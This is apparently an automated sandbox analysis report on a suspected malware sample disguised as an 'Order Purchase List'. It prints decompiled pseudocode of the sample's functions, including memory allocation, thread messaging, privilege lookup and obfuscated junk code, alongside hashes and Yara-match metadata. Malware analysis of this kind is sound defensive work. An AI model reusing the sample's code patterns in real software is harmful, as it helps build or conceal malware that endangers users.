                                      				_t4 = _t11 + 0xc60; // 0xca0
                                      				E004191F0(_t22, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
                                      				_t15 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                      				return _t15;
                                      			}






                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: a7fcf47da037be7e9456cd9548bddf61e73e5b3801b77c4638da0012dd1dea36
                                      • Instruction ID: 0b1102f9643000783a93479c972c01997cead1655d45cb6d468c59136dbfc457
                                      • Opcode Fuzzy Hash: a7fcf47da037be7e9456cd9548bddf61e73e5b3801b77c4638da0012dd1dea36
                                      • Instruction Fuzzy Hash: 1CF0F2B6200219ABDB18DF89DC85EEB77ADAF88754F158159FE1897242C630E810CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 290 4187d0-4187e6 291 4187ec-41880d NtAllocateVirtualMemory 290->291 292 4187e7 call 4191f0 290->292 292->291
                                      C-Code - Quality: 100%
                                      			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                      				long _t14;
                                      				void* _t21;
                                      
                                      				_t3 = _a4 + 0xc60; // 0xca0
                                      				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                      				return _t14;
                                      			}






                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 302 41871a-418749 call 4191f0 NtClose
                                      C-Code - Quality: 100%
                                      			E0041871A(void* __edx, void* __edi, intOrPtr _a3, void* _a7) {
                                      				long _t11;
                                      
                                      				_t8 = _a3;
                                      				_t5 = _t8 + 0x10; // 0x300
                                      				_t6 = _t8 + 0xc50; // 0x409773
                                      				E004191F0(__edi, _a3, _t6,  *_t5, 0, 0x2c);
                                      				_t11 = NtClose(_a7); // executed
                                      				return _t11;
                                      			}





                                      APIs
                                      • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 4c9aa5a8c3fd6b91dafd6044fb2f87fe13b6e1ce7f62f0dc267f75646e749436
                                      • Instruction ID: f0132b64245bc20d604c56c4bf908407b35f35b6fedb34f02f719d5c3b5e342b
                                      • Opcode Fuzzy Hash: 4c9aa5a8c3fd6b91dafd6044fb2f87fe13b6e1ce7f62f0dc267f75646e749436
                                      • Instruction Fuzzy Hash: 99E08C71200110BBD710DFA88C89FE77B28EF88220F044199BA189B242C631E55086D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00418720(intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t11;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x409773
                                      				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}






                                      APIs
                                      • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E004088E0(intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				char _v24;
                                      				char _v284;
                                      				char _v804;
                                      				char _v840;
                                      				void* _t24;
                                      				void* _t31;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t39;
                                      				void* _t50;
                                      				intOrPtr _t52;
                                      				void* _t53;
                                      				void* _t54;
                                      				void* _t55;
                                      				void* _t56;
                                      
                                      				_t52 = _a4;
                                      				_t39 = 0; // executed
                                      				_t24 = E00406E30(_t52,  &_v24); // executed
                                      				_t54 = _t53 + 8;
                                      				if(_t24 != 0) {
                                      					E00407040( &_v24,  &_v840);
                                      					_t55 = _t54 + 8;
                                      					do {
                                      						E0041A100( &_v284, 0x104);
                                      						E0041A770( &_v284,  &_v804);
                                      						_t56 = _t55 + 0x10;
                                      						_t50 = 0x4f;
                                      						while(1) {
                                      							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                      							_t56 = _t56 + 0x10;
                                      							if(_t31 != 0) {
                                      								break;
                                      							}
                                      							_t50 = _t50 + 1;
                                      							if(_t50 <= 0x62) {
                                      								continue;
                                      							} else {
                                      							}
                                      							goto L8;
                                      						}
                                      						_t9 = _t52 + 0x14; // 0xffffe1a5
                                      						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                      						_t39 = 1;
                                      						L8:
                                      						_t33 = E00407070( &_v24,  &_v840);
                                      						_t55 = _t56 + 8;
                                      					} while (_t33 != 0 && _t39 == 0);
                                      					_t34 = E004070F0(_t52,  &_v24); // executed
                                      					if(_t39 == 0) {
                                      						asm("rdtsc");
                                      						asm("rdtsc");
                                      						_v8 = _t34 - 0 + _t34;
                                      						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                      					}
                                      					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                      					_t20 = _t52 + 0x31; // 0x5608758b
                                      					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                      					return 1;
                                      				} else {
                                      					return _t24;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                      • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                      • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                      • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                      C-Code - Quality: 100%
                                      			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                      				void* _t10;
                                      				void* _t15;
                                      
                                      				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                      				_t6 =  &_a8; // 0x413546
                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: F5A
                                      • API String ID: 1279760036-683449296
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 201 407313-40731e 202 407320-407378 call 41a150 call 407290 call 4199e0 201->202 203 4072d2-4072da 201->203 216 407380-4073b2 call 40d3e0 call 418790 202->216 205 4072dc-4072ee PostThreadMessageW 203->205 206 40730e-407312 203->206 208 4072f0-40730a call 4092b0 205->208 209 40730d 205->209 208->209 209->206 221 4073b4-4073bc 216->221 222 4073e7-4073ef 216->222 223 4073d6-4073e0 221->223 224 4073be-4073c5 221->224 223->216 225 4073e2-4073e5 223->225 224->223 226 4073c7-4073ce 224->226 228 40740d-40741f call 418720 225->228 226->223 227 4073d0-4073d4 226->227 227->223 229 4073f0-40740a call 41a0d0 227->229 228->222 234 407421-40748c call 417fa0 228->234 229->228 234->222 237 407492-4074ee call 417fe0 234->237 237->222 240 4074f4-407541 call 419680 call 4196a0 call 41a3c0 call 41a0d0 call 413a60 237->240
                                      C-Code - Quality: 91%
                                      			E00407313(void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				intOrPtr _v0;
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				char _v656;
                                      				intOrPtr _v668;
                                      				char _v688;
                                      				intOrPtr _v692;
                                      				void* _t61;
                                      				intOrPtr _t64;
                                      				intOrPtr _t67;
                                      				intOrPtr _t73;
                                      				intOrPtr _t75;
                                      				void* _t82;
                                      				void* _t86;
                                      				intOrPtr _t88;
                                      				intOrPtr* _t89;
                                      				void* _t113;
                                      				intOrPtr _t114;
                                      				void* _t123;
                                      				void* _t125;
                                      				void* _t132;
                                      
                                      				asm("adc ch, 0x43");
                                      				_t113 = __esi - 1;
                                      				asm("popfd");
                                      				asm("loopne 0xffffffb4");
                                      				_push(_t85);
                                      				_push(_t113);
                                      				_v12 = 0;
                                      				_v692 = 0;
                                      				E0041A150( &_v688, 0, 0x2a4);
                                      				_t114 = _a12;
                                      				_t109 = _v0;
                                      				E00407290(_t132, _v0,  *((intOrPtr*)(_t114 + 0x300))); // executed
                                      				_t125 = _t123 - 0x2ac + 0x14;
                                      				_t61 = E004199E0( *((intOrPtr*)(_t114 + 0x300)));
                                      				_t9 =  *((intOrPtr*)(_t114 + 0x2d4)) + 0x29000; // 0x29000
                                      				_t86 = _t61 + _t9;
                                      				_a12 = 0;
                                      				while(1) {
                                      					E0040D3E0(_t109, 0xfe363c80); // executed
                                      					_t64 = E00418790(_t109,  *((intOrPtr*)(_t114 + 0x2f4)), _t86,  &_v688, 0x2a8, 0); // executed
                                      					_t125 = _t125 + 0x20;
                                      					 *((intOrPtr*)(_t114 + 0x2dc)) = _t64;
                                      					if(_t64 < 0) {
                                      						break;
                                      					}
                                      					if(_v656 == 0 || _v668 == 0 || _v136 == 0 || _v132 == 0) {
                                      						_t67 = _a16 + 1;
                                      						_a16 = _t67;
                                      						if(_t67 < 2) {
                                      							continue;
                                      						} else {
                                      							_t88 = _v8;
                                      							goto L11;
                                      						}
                                      					} else {
                                      						_t88 = 1;
                                      						E0041A0D0(_a12,  &_v688, 0x2a8);
                                      						_t125 = _t125 + 0xc;
                                      						L11:
                                      						E00418720(_t109,  *((intOrPtr*)(_t114 + 0x2f4))); // executed
                                      						if(_t88 == 0) {
                                      							break;
                                      						} else {
                                      							 *((intOrPtr*)(_a12 + 0x14)) = _v668;
                                      							_t29 = _t114 + 0x2e8; // 0x2e8
                                      							 *_t29 = _v136;
                                      							_t31 = _t114 + 0x314; // 0x314
                                      							_t89 = _t31;
                                      							 *_t89 = 0x18;
                                      							 *((intOrPtr*)(_t114 + 0x318)) = 0;
                                      							 *((intOrPtr*)(_t114 + 0x320)) = 0;
                                      							 *((intOrPtr*)(_t114 + 0x31c)) = 0;
                                      							 *((intOrPtr*)(_t114 + 0x324)) = 0;
                                      							 *((intOrPtr*)(_t114 + 0x328)) = 0;
                                      							_t73 = E00417FA0(_t109, _a12 + 0x220,  *((intOrPtr*)(_t114 + 0x2d0)), _t89, _t29);
                                      							 *((intOrPtr*)(_t114 + 0x2dc)) = _t73;
                                      							if(_t73 < 0) {
                                      								break;
                                      							} else {
                                      								_t39 = _t114 + 0x2e0; // 0x2e0
                                      								 *((intOrPtr*)(_t114 + 0x318)) = 0;
                                      								 *((intOrPtr*)(_t114 + 0x320)) = 0;
                                      								 *((intOrPtr*)(_t114 + 0x31c)) = 0;
                                      								 *((intOrPtr*)(_t114 + 0x324)) = 0;
                                      								 *((intOrPtr*)(_t114 + 0x328)) = 0;
                                      								_t99 = _a12 + 0x224;
                                      								 *((intOrPtr*)(_t114 + 0x2e4)) = _v132;
                                      								 *_t89 = 0x18;
                                      								 *((intOrPtr*)(_t114 + 0x2d0)) = 0x1a;
                                      								_t75 = E00417FE0(_t109, _a12 + 0x224, 0x1a, _t89, _t39);
                                      								 *((intOrPtr*)(_t114 + 0x2dc)) = _t75;
                                      								if(_t75 < 0) {
                                      									break;
                                      								} else {
                                      									_t54 = E0041A3C0( *((intOrPtr*)(E004196A0(0, E00419680(_t99)) + 0x28))) + 2; // 0x2
                                      									E0041A0D0( *((intOrPtr*)(_a8 + 0x10)) + 0x200,  *((intOrPtr*)(_t77 + 0x28)), _t79 + _t54);
                                      									_t82 = E00413A60(_t109,  &_v656, 2, 0); // executed
                                      									return _t82;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L15:
                                      				}
                                      				__eflags = 0;
                                      				return 0;
                                      				goto L15;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: d26555b3d73cabb215d2d8ea9ffb1d7f91d59228ee88797864ce60a87e53bc5c
                                      • Instruction ID: 96d9cf456a23ca70d715dd3101c5aad66ffcbef7e238b83a71237143956e7880
                                      • Opcode Fuzzy Hash: d26555b3d73cabb215d2d8ea9ffb1d7f91d59228ee88797864ce60a87e53bc5c
                                      • Instruction Fuzzy Hash: 9D61C470A00305AFD714DF55DC85BEB77A8EB44304F10446EF959A7281DB74B941CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 251 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 260 4072dc-4072ee PostThreadMessageW 251->260 261 40730e-407312 251->261 262 4072f0-40730a call 4092b0 260->262 263 40730d 260->263 262->263 263->261
                                      C-Code - Quality: 82%
                                      			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t12;
                                      				intOrPtr* _t13;
                                      				int _t14;
                                      				long _t21;
                                      				intOrPtr* _t25;
                                      				void* _t26;
                                      				void* _t30;
                                      
                                      				_t30 = __eflags;
                                      				_v68 = 0;
                                      				E0041A150( &_v67, 0, 0x3f);
                                      				E0041AD30( &_v68, 3);
                                      				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t25 = _t13;
                                      				if(_t25 != 0) {
                                      					_t21 = _a8;
                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                      					_t32 = _t14;
                                      					if(_t14 == 0) {
                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                      					}
                                      					return _t14;
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 293 4188f4-418917 call 4191f0 295 41891c-418931 RtlFreeHeap 293->295
                                      C-Code - Quality: 58%
                                      			E004188F4(void* __ecx, void* __edx, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
                                      				intOrPtr _v117;
                                      				char _t14;
                                      				void* _t21;
                                      
                                      				asm("ficom dword [eax-0x40b74411]");
                                      				asm("out dx, eax");
                                      				asm("cmpsb");
                                      				_v117 = _v117 - __edx;
                                      				_t11 = _a8;
                                      				_t5 = _t11 + 0xc74; // 0xc74
                                      				E004191F0(_t21, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                      				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                      				return _t14;
                                      			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: e524f0364c526cb56da02293c0cb6e8b1287fcdf62ac2d8fec42ccd86ad49f2a
                                      • Instruction ID: 2f9c997de783ff4cbd25a8b042c99e91554636a3dcb3ae642e08bd5c5158753f
                                      • Opcode Fuzzy Hash: e524f0364c526cb56da02293c0cb6e8b1287fcdf62ac2d8fec42ccd86ad49f2a
                                      • Instruction Fuzzy Hash: C4E06DB12142046FDB24EF7ACC59ED77BA8AF48350F118599FD09DB252D631E814CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 296 418900-418916 297 41891c-418931 RtlFreeHeap 296->297 298 418917 call 4191f0 296->298 298->297
                                      C-Code - Quality: 100%
                                      			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                      				char _t10;
                                      				void* _t15;
                                      
                                      				_t3 = _a4 + 0xc74; // 0xc74
                                      				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}





                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 299 418a60-418a94 call 4191f0 LookupPrivilegeValueW
                                      C-Code - Quality: 100%
                                      			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t10;
                                      				void* _t15;
                                      
                                      				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}





                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00418940(intOrPtr _a4, int _a8) {
                                      				void* _t10;
                                      
                                      				_t5 = _a4;
                                      				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8);
                                      			}




                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 57%
                                      			E0041BCF2() {
                                      				signed int _t102;
                                      				signed char _t103;
                                      				signed int _t105;
                                      				signed char _t113;
                                      				signed char _t121;
                                      				signed int _t122;
                                      				signed int _t123;
                                      				void* _t125;
                                      				void* _t126;
                                      				signed int _t129;
                                      				signed int _t132;
                                      				signed int _t137;
                                      				signed int _t139;
                                      
                                      				asm("adc esi, [0xff3fb7e9]");
                                      				asm("adc esi, 0x7657392f");
                                      				_pop(_t129);
                                      				_t123 = _t122 ^ 0xa02788a9;
                                      				_t103 = _t102 |  *0x4d0f356f;
                                      				_t132 =  *0xafa43f6b * 0x3fee;
                                      				_push(_t103);
                                      				if(_t132 > 0) {
                                      					__ecx = __ecx -  *0xbe24c776;
                                      					__eflags = __ecx;
                                      					if(__ecx == 0) {
                                      						_t33 = __ecx;
                                      						__ecx =  *0xc0311175;
                                      						 *0xc0311175 = _t33;
                                      						 *0x190e0a9d =  *0x190e0a9d >> 0x6e;
                                      						asm("adc bh, 0x2c");
                                      						__ebp = __ebp + 0x8c0a74f3;
                                      						asm("sbb [0x83f6fa6e], edi");
                                      						asm("sbb ebx, [0x75568dd3]");
                                      						asm("adc [0x79008c12], cl");
                                      						__eflags = __dh -  *0x3d350ce4;
                                      						__esp = __esi;
                                      						asm("rol dword [0x101d5098], 0x66");
                                      						asm("adc ebp, 0x884c77d4");
                                      						__eflags =  *0xd52d1808 - __ah;
                                      						asm("sbb dl, 0x1c");
                                      						 *0x7c2ea732 =  *0x7c2ea732 | __bh;
                                      						__bh = __bh ^ 0x00000018;
                                      						__ebx = __ebx + 1;
                                      						__ebp = __ebp - 1;
                                      						__al = __al ^ 0x000000b3;
                                      						__ebx =  *0xeaa43e9a;
                                      						asm("ror byte [0x7e8ebeb1], 0x58");
                                      						__edi = __edi + 1;
                                      						 *0xc71486f4 =  *0xc71486f4 & __ecx;
                                      						asm("sbb dl, [0x7d30a1d7]");
                                      						__ecx = __ecx & 0x4a99f213;
                                      						__bh = __bh +  *0xb27c0e80;
                                      						_push(__ebx);
                                      						__dh = __dh -  *0xa182d0c;
                                      						_push(__ebx);
                                      						asm("rcl dword [0xe4b5a06c], 0x3e");
                                      						__bl = __bl -  *0x4b9d8bb5;
                                      						_push(__ebx);
                                      						asm("adc edx, 0xebcd4393");
                                      						__bl = __bl & 0x0000008a;
                                      						__ebp = __ebp + 1;
                                      						__eflags = __ebp;
                                      						if(__ebp >= 0) {
                                      							 *0x4812ff72 =  *0x4812ff72 ^ __eax;
                                      							__ebx = 0x6cb02f8d;
                                      							asm("sbb ah, [0x3c0f8db1]");
                                      							 *0x9bc13822 =  *0x9bc13822 + __bl;
                                      							__eflags = __bh -  *0xb7052863;
                                      							__bl = __bl -  *0xd7a4e300;
                                      							_push( *0xecfecb05);
                                      							asm("lodsb");
                                      							 *0xdea305d7 =  *0xdea305d7 ^ __bh;
                                      							 *0x5d78fbc =  *0x5d78fbc + __ebp;
                                      							asm("adc edx, [0xa3d6d99b]");
                                      							__bl = __bl | 0x000000d7;
                                      							asm("sbb ebp, 0xdae67b05");
                                      							asm("movsw");
                                      							asm("rcr byte [0xc75b05d7], 0xdc");
                                      							asm("sbb ebp, [0x3d795be]");
                                      							 *0x40bce88 =  *0x40bce88 & __ch;
                                      							__eflags =  *0x938b7e80 & __dh;
                                      							 *0x88e73404 =  *0x88e73404 >> 0xba;
                                      							asm("sbb [0xdd720493], eax");
                                      							asm("adc edi, [0x1504938e]");
                                      							 *0x59390dc =  *0x59390dc >> 0x22;
                                      							__ch = __ch ^  *0x99e126b0;
                                      							__bl = 0xd7;
                                      							 *0xb2de2005 =  *0xb2de2005 | __ecx;
                                      							asm("adc esi, [0x6905d78f]");
                                      							__eflags = __eax - 0xd791bbd8;
                                      							 *0xaffc5007 =  *0xaffc5007 << 0xd9;
                                      							__ecx = __ecx - 1;
                                      							__ebp = __ebp & 0x0783fdd4;
                                      							__ch =  *0x4295cff6;
                                      							__esi = __esi ^ 0x0783fbd9;
                                      							__ecx = __ecx + 0x78221609;
                                      							__bl =  *0x783f9d7;
                                      							_push(__esp);
                                      							__eflags =  *0x9aeb826f & __esi;
                                      							asm("sbb edi, 0xae088301");
                                      							 *0xcd5df400 & __dh = __esi & 0x08b15c19;
                                      							__eflags = __al & 0x00000088;
                                      							__ch =  *0x4295cff6 & 0x00000038;
                                      							__edi = __edi - 1;
                                      							__ecx =  *0x46cc4060 * 0x8b1;
                                      							__edx = __edx - 1;
                                      							 *0xc21d9d00 - __ah = __esi - 0x8b1531f;
                                      							__eax = __eax - 1;
                                      							__eflags =  *0x6c928fb0 & __ch;
                                      							__cl = __cl ^ 0x000000e0;
                                      							__edx = __edx - 1;
                                      							asm("adc [0x2cbd09b1], al");
                                      							__bh = __bh |  *0x2393ca0c;
                                      							 *0x91e019e & __esi =  *0x321b0e62 & __ecx;
                                      							__eflags = __al & 0x000000c9;
                                      							 *0x1e19c117 =  *0x1e19c117 << 0xf5;
                                      							__eflags =  *0x6dd08a09 - __ecx;
